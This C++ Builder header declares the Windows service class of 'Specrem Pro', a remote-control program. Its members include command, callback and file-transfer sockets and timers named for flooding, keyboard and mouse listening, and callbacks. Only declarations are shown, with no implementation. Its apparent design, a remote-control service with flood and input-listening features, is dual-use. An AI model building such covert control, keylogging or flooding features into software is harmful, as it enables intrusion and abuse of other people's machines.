/*****************************************************************************
*
*    Specrem Pro - Remote Controlling Software
*    Copyright (C) 2002  Specrem Group
*
*    This program is free software; you can redistribute it and/or modify
*    it under the terms of the GNU General Public License as published by
*    the Free Software Foundation; either version 2 of the License, or
*    (at your option) any later version.
*
*    This program is distributed in the hope that it will be useful,
*    but WITHOUT ANY WARRANTY; without even the implied warranty of
*    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
*    GNU General Public License for more details.
*
*    You should have received a copy of the GNU General Public License
*    along with this program; if not, write to the Free Software
*    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
*
*****************************************************************************/


// Copyright (C) 2002  Antti Kirjavainen


//---------------------------------------------------------------------------
#ifndef MainH
#define MainH
//---------------------------------------------------------------------------
#include <SysUtils.hpp>
#include <Classes.hpp>
#include <SvcMgr.hpp>
#include <vcl.h>
#include <ScktComp.hpp>
#include <IdBaseComponent.hpp>
#include <IdComponent.hpp>
#include <IdHTTPServer.hpp>
#include <IdTCPServer.hpp>
#include <ExtCtrls.hpp>
#include "trayicon.h"
#include <Menus.hpp>
//---------------------------------------------------------------------------
class TSServer7 : public TService
{
__published:    // IDE-managed Components
        TServerSocket *sckCommand;
        TClientSocket *sckCallback;
        TTimer *tmrLogin;
        TTimer *tmrShutdown;
        TPopupMenu *mnuPopUp;
        TMenuItem *mnuAbout;
        TTimer *tmrJoinFlood;
        TTimer *tmrRefreshTrayIcon;
        TTimer *tmrCallback;
        TServerSocket *sckFile;
        void __fastcall ServiceStart(TService *Sender, bool &Started);
        void __fastcall ServiceStop(TService *Sender, bool &Stopped);
        void __fastcall sckCommandClientConnect(TObject *Sender,
          TCustomWinSocket *Socket);
        void __fastcall sckCommandClientRead(TObject *Sender,
          TCustomWinSocket *Socket);
        void __fastcall sckCommandClientDisconnect(TObject *Sender,
          TCustomWinSocket *Socket);
        void __fastcall tmrLoginTimer(TObject *Sender);
        void __fastcall tmrShutdownTimer(TObject *Sender);
        void __fastcall sckCommandClientError(TObject *Sender,
          TCustomWinSocket *Socket, TErrorEvent ErrorEvent,
          int &ErrorCode);
        void __fastcall ServicePause(TService *Sender, bool &Paused);
        void __fastcall ServiceContinue(TService *Sender, bool &Continued);
        void __fastcall tmrJoinFloodTimer(TObject *Sender);
        void __fastcall sckRouteConnect(TObject *Sender,
          TCustomWinSocket *Socket);
        void __fastcall sckRouteDisconnect(TObject *Sender,
          TCustomWinSocket *Socket);
        void __fastcall sckRouteError(TObject *Sender,
          TCustomWinSocket *Socket, TErrorEvent ErrorEvent,
          int &ErrorCode);
        void __fastcall sckRouteRead(TObject *Sender,
          TCustomWinSocket *Socket);
        void __fastcall ServiceAfterInstall(TService *Sender);
        void __fastcall ServiceBeforeUninstall(TService *Sender);
        void __fastcall tmrRefreshTrayIconTimer(TObject *Sender);
        void __fastcall tmrFloodTimer(TObject *Sender);
        void __fastcall tmrCallbackTimer(TObject *Sender);
        void __fastcall SendCommand(const AnsiString sCommand, const AnsiString sParams, const unsigned int sHandle);
        void __fastcall SendToAll(const AnsiString sCommand, const AnsiString sParams, const unsigned int sNotToHandle);
        void __fastcall sckFileClientConnect(TObject *Sender,
          TCustomWinSocket *Socket);
        void __fastcall sckFileClientRead(TObject *Sender,
          TCustomWinSocket *Socket);
        void __fastcall tmrMouseListenTimer(TObject *Sender);
        void __fastcall tmrKeyboardListenTimer(TObject *Sender);
        void __fastcall tmrPingTimer(TObject *Sender);
        void __fastcall ServiceShutdown(TService *Sender);
private:        // User declarations
public:         // User declarations
	__fastcall TSServer7(TComponent* Owner);
	TServiceController __fastcall GetServiceController(void);

	friend void __stdcall ServiceController(unsigned CtrlCode);
};

//---------------------------------------------------------------------------
extern PACKAGE TSServer7 *SServer7;
//---------------------------------------------------------------------------
#endif
